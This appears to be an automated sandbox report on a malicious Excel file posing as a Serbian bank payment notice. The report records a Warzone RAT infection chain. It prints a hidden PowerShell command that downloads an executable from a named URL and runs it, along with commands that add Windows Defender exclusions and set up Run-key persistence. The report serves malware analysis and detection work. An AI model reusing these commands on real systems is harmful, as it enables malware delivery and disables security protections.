Analysis
-
max time kernel
124s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2022 16:58
Behavioral task
behavioral1
Sample
Obavestenje o prilivu za 16000501003826304627.xls
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
Obavestenje o prilivu za 16000501003826304627.xls
Resource
win10v2004-20220901-en
General
-
Target
Obavestenje o prilivu za 16000501003826304627.xls
-
Size
128KB
-
MD5
cadc7a1ce95a518b28bc427259034546
-
SHA1
5f362f13ceb06e1b8e088bbaa5fba367a6bff837
-
SHA256
51d7e9d83ee47fde362716e9c50252dff4ea3891a2cf89e4be84d1551d104688
-
SHA512
16db805befc401a2aa5883aedfff24d9785c9df31f535221779a5d6090a22ada96025739c42ccb6ed0208b8c43015db6996dba688d95fc8b461988b2c92a6e3e
-
SSDEEP
3072:msk3hbdlylKsgqopeJBWhZFGkE+cL2NdAnROAPDU0wERoB1HBCzEY/G0aDYKtOKW:zk3hbdlylKsgqopeJBWhZFVE+W2NdARX
Malware Config
Extracted
https://www.voievodulgelu.ro/owncloud/index.php/s/sX8sarn7G0Cmusz/download
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4384 5036 powershell.exe EXCEL.EXE -
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Warzone RAT payload 7 IoCs
Processes:
resource yara_rule behavioral2/memory/1212-159-0x0000000000400000-0x0000000000568000-memory.dmp warzonerat behavioral2/memory/1212-163-0x0000000000400000-0x0000000000568000-memory.dmp warzonerat behavioral2/memory/1212-164-0x0000000000400000-0x0000000000568000-memory.dmp warzonerat behavioral2/memory/1212-183-0x0000000000400000-0x0000000000568000-memory.dmp warzonerat behavioral2/memory/840-201-0x0000000000400000-0x0000000000568000-memory.dmp warzonerat behavioral2/memory/840-203-0x0000000000400000-0x0000000000568000-memory.dmp warzonerat behavioral2/memory/840-211-0x0000000000400000-0x0000000000568000-memory.dmp warzonerat -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 30 4384 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
Processes:
Word51990.exeWord51990.exeWord51990.exeWord51990.exeAdobe51990.exeAdobe51990.exeAdobe51990.exepid process 548 Word51990.exe 4144 Word51990.exe 2688 Word51990.exe 1212 Word51990.exe 2764 Adobe51990.exe 4168 Adobe51990.exe 840 Adobe51990.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Adobe51990.exeWord51990.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Adobe51990.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Word51990.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Word51990.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Adobe51990 = "C:\\Users\\Admin\\Documents\\Adobe51990.exe" Word51990.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
Word51990.exeAdobe51990.exedescription pid process target process PID 548 set thread context of 1212 548 Word51990.exe Word51990.exe PID 2764 set thread context of 840 2764 Adobe51990.exe Adobe51990.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 5036 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
powershell.exeWord51990.exepowershell.exepowershell.exeAdobe51990.exepowershell.exepowershell.exepid process 4384 powershell.exe 4384 powershell.exe 548 Word51990.exe 548 Word51990.exe 548 Word51990.exe 548 Word51990.exe 548 Word51990.exe 548 Word51990.exe 2168 powershell.exe 2168 powershell.exe 864 powershell.exe 864 powershell.exe 2764 Adobe51990.exe 2764 Adobe51990.exe 2764 Adobe51990.exe 2764 Adobe51990.exe 2212 powershell.exe 2212 powershell.exe 2180 powershell.exe 2180 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exeWord51990.exepowershell.exepowershell.exeAdobe51990.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4384 powershell.exe Token: SeDebugPrivilege 548 Word51990.exe Token: SeDebugPrivilege 2168 powershell.exe Token: SeDebugPrivilege 864 powershell.exe Token: SeDebugPrivilege 2764 Adobe51990.exe Token: SeDebugPrivilege 2212 powershell.exe Token: SeDebugPrivilege 2180 powershell.exe -
Suspicious use of SetWindowsHookEx 15 IoCs
Processes:
EXCEL.EXEAdobe51990.exepid process 5036 EXCEL.EXE 5036 EXCEL.EXE 5036 EXCEL.EXE 5036 EXCEL.EXE 5036 EXCEL.EXE 5036 EXCEL.EXE 5036 EXCEL.EXE 5036 EXCEL.EXE 5036 EXCEL.EXE 5036 EXCEL.EXE 5036 EXCEL.EXE 5036 EXCEL.EXE 5036 EXCEL.EXE 5036 EXCEL.EXE 840 Adobe51990.exe -
Suspicious use of WriteProcessMemory 56 IoCs
Processes:
EXCEL.EXEpowershell.exeWord51990.exeWord51990.exeAdobe51990.exeAdobe51990.exedescription pid process target process PID 5036 wrote to memory of 4384 5036 EXCEL.EXE powershell.exe PID 5036 wrote to memory of 4384 5036 EXCEL.EXE powershell.exe PID 4384 wrote to memory of 548 4384 powershell.exe Word51990.exe PID 4384 wrote to memory of 548 4384 powershell.exe Word51990.exe PID 4384 wrote to memory of 548 4384 powershell.exe Word51990.exe PID 548 wrote to memory of 2168 548 Word51990.exe powershell.exe PID 548 wrote to memory of 2168 548 Word51990.exe powershell.exe PID 548 wrote to memory of 2168 548 Word51990.exe powershell.exe PID 548 wrote to memory of 4144 548 Word51990.exe Word51990.exe PID 548 wrote to memory of 4144 548 Word51990.exe Word51990.exe PID 548 wrote to memory of 4144 548 Word51990.exe Word51990.exe PID 548 wrote to memory of 2688 548 Word51990.exe Word51990.exe PID 548 wrote to memory of 2688 548 Word51990.exe Word51990.exe PID 548 wrote to memory of 2688 548 Word51990.exe Word51990.exe PID 548 wrote to memory of 1212 548 Word51990.exe Word51990.exe PID 548 wrote to memory of 1212 548 Word51990.exe Word51990.exe PID 548 wrote to memory of 1212 548 Word51990.exe Word51990.exe PID 548 wrote to memory of 1212 548 Word51990.exe Word51990.exe PID 548 wrote to memory of 1212 548 Word51990.exe Word51990.exe PID 548 wrote to memory of 1212 548 Word51990.exe Word51990.exe PID 548 wrote to memory of 1212 548 Word51990.exe Word51990.exe PID 548 wrote to memory of 1212 548 Word51990.exe Word51990.exe PID 548 wrote to memory of 1212 548 Word51990.exe Word51990.exe PID 548 wrote to memory of 1212 548 Word51990.exe Word51990.exe PID 548 wrote to memory of 1212 548 Word51990.exe Word51990.exe PID 1212 wrote to memory of 864 1212 Word51990.exe powershell.exe PID 1212 wrote to memory of 864 1212 Word51990.exe powershell.exe PID 1212 wrote to memory of 864 1212 Word51990.exe powershell.exe PID 1212 wrote to memory of 2764 1212 Word51990.exe Adobe51990.exe PID 1212 wrote to memory of 2764 1212 Word51990.exe Adobe51990.exe PID 1212 wrote to memory of 2764 1212 Word51990.exe Adobe51990.exe PID 2764 wrote to memory of 2212 2764 Adobe51990.exe powershell.exe PID 2764 wrote to memory of 2212 2764 Adobe51990.exe powershell.exe PID 2764 wrote to memory of 2212 2764 Adobe51990.exe powershell.exe PID 2764 wrote to memory of 4168 2764 Adobe51990.exe Adobe51990.exe PID 2764 wrote to memory of 4168 2764 Adobe51990.exe Adobe51990.exe PID 2764 wrote to memory of 4168 2764 Adobe51990.exe Adobe51990.exe PID 2764 wrote to memory of 840 2764 Adobe51990.exe Adobe51990.exe PID 2764 wrote to memory of 840 2764 Adobe51990.exe Adobe51990.exe PID 2764 wrote to memory of 840 2764 Adobe51990.exe Adobe51990.exe PID 2764 wrote to memory of 840 2764 Adobe51990.exe Adobe51990.exe PID 2764 wrote to memory of 840 2764 Adobe51990.exe Adobe51990.exe PID 2764 wrote to memory of 840 2764 Adobe51990.exe Adobe51990.exe PID 2764 wrote to memory of 840 2764 Adobe51990.exe Adobe51990.exe PID 2764 wrote to memory of 840 2764 Adobe51990.exe Adobe51990.exe PID 2764 wrote to memory of 840 2764 Adobe51990.exe Adobe51990.exe PID 2764 wrote to memory of 840 2764 Adobe51990.exe Adobe51990.exe PID 2764 wrote to memory of 840 2764 Adobe51990.exe Adobe51990.exe PID 840 wrote to memory of 2180 840 Adobe51990.exe powershell.exe PID 840 wrote to memory of 2180 840 Adobe51990.exe powershell.exe PID 840 wrote to memory of 2180 840 Adobe51990.exe powershell.exe PID 840 wrote to memory of 2296 840 Adobe51990.exe cmd.exe PID 840 wrote to memory of 2296 840 Adobe51990.exe cmd.exe PID 840 wrote to memory of 2296 840 Adobe51990.exe cmd.exe PID 840 wrote to memory of 2296 840 Adobe51990.exe cmd.exe PID 840 wrote to memory of 2296 840 Adobe51990.exe cmd.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Obavestenje o prilivu za 16000501003826304627.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://www.voievodulgelu.ro/owncloud/index.php/s/sX8sarn7G0Cmusz/download','Word51990.exe');Start-Process 'Word51990.exe'2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Users\Admin\Documents\Word51990.exe"C:\Users\Admin\Documents\Word51990.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\Word51990.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
-
C:\Users\Admin\Documents\Word51990.exe"C:\Users\Admin\Documents\Word51990.exe"4⤵
- Executes dropped EXE
PID:4144
-
-
C:\Users\Admin\Documents\Word51990.exe"C:\Users\Admin\Documents\Word51990.exe"4⤵
- Executes dropped EXE
PID:2688
-
-
C:\Users\Admin\Documents\Word51990.exe"C:\Users\Admin\Documents\Word51990.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Users\Admin\Documents\Adobe51990.exe"C:\Users\Admin\Documents\Adobe51990.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\Adobe51990.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
-
C:\Users\Admin\Documents\Adobe51990.exe"C:\Users\Admin\Documents\Adobe51990.exe"6⤵
- Executes dropped EXE
PID:4168
-
-
C:\Users\Admin\Documents\Adobe51990.exe"C:\Users\Admin\Documents\Adobe51990.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2180
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe"7⤵PID:2296
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
1KB
MD5eb4d127b8a6f84a1cee423c5e3e3a51d
SHA1c55263a8ff097067f2393ce2120801a445fd1949
SHA256d73b077e2ae7f7608ebf774fb83ab13c7bc7a5c3e4d9d96fda2bf695dc698514
SHA51245a52004f8b63ac089de017437ba0e03335f18469942795d36ce3c3d017f842e582103c91e07d9af0fa8dfbbe6f2f68f2fac91383a48b6535952a8630911f21e
-
Filesize
18KB
MD588a643c8c7a7b9f9d1ea3cce5bd0b8d5
SHA1b632fdf6db58485913c32c6a8f66b83a9904145c
SHA256a74c4ef42e0ecfd01f73edee4162c8eeeb31bdec43c3bc2ed5d44df5a8013ec3
SHA5120ef6bbe9a87b69080ae88696fbf1b6d272babbbb5b584fbd8db3ac9b49715dc0027de24be53d21c0fdef9a3cbb0b23c0e6773083b93db7eede463682f18d210d
-
Filesize
18KB
MD588a643c8c7a7b9f9d1ea3cce5bd0b8d5
SHA1b632fdf6db58485913c32c6a8f66b83a9904145c
SHA256a74c4ef42e0ecfd01f73edee4162c8eeeb31bdec43c3bc2ed5d44df5a8013ec3
SHA5120ef6bbe9a87b69080ae88696fbf1b6d272babbbb5b584fbd8db3ac9b49715dc0027de24be53d21c0fdef9a3cbb0b23c0e6773083b93db7eede463682f18d210d
-
Filesize
18KB
MD589fca251018c9ccffd8b2b7f71a4908d
SHA1262ab1179876bdfdb83dd97e8463c9a0a4540b03
SHA25608967d9a2680a07daf58bfd93911828ccf2776c936c8bc16a9762eef7de54afa
SHA5126a79a398f036f5fbeb10b8137f2bcfaaa170747957050385f382b733591645e0c23dd231a2963984b465a9b529a4e8850ff711953fdf2278d099b7d3bdd77d97
-
Filesize
718KB
MD585750367cd487007195495632df84a86
SHA1e234502cd367222b7d17b936e0560272a07e6686
SHA2562ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71
SHA512d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203
-
Filesize
718KB
MD585750367cd487007195495632df84a86
SHA1e234502cd367222b7d17b936e0560272a07e6686
SHA2562ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71
SHA512d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203
-
Filesize
718KB
MD585750367cd487007195495632df84a86
SHA1e234502cd367222b7d17b936e0560272a07e6686
SHA2562ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71
SHA512d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203
-
Filesize
718KB
MD585750367cd487007195495632df84a86
SHA1e234502cd367222b7d17b936e0560272a07e6686
SHA2562ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71
SHA512d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203
-
Filesize
718KB
MD585750367cd487007195495632df84a86
SHA1e234502cd367222b7d17b936e0560272a07e6686
SHA2562ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71
SHA512d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203
-
Filesize
718KB
MD585750367cd487007195495632df84a86
SHA1e234502cd367222b7d17b936e0560272a07e6686
SHA2562ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71
SHA512d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203
-
Filesize
718KB
MD585750367cd487007195495632df84a86
SHA1e234502cd367222b7d17b936e0560272a07e6686
SHA2562ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71
SHA512d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203
-
Filesize
718KB
MD585750367cd487007195495632df84a86
SHA1e234502cd367222b7d17b936e0560272a07e6686
SHA2562ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71
SHA512d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203
-
Filesize
718KB
MD585750367cd487007195495632df84a86
SHA1e234502cd367222b7d17b936e0560272a07e6686
SHA2562ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71
SHA512d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203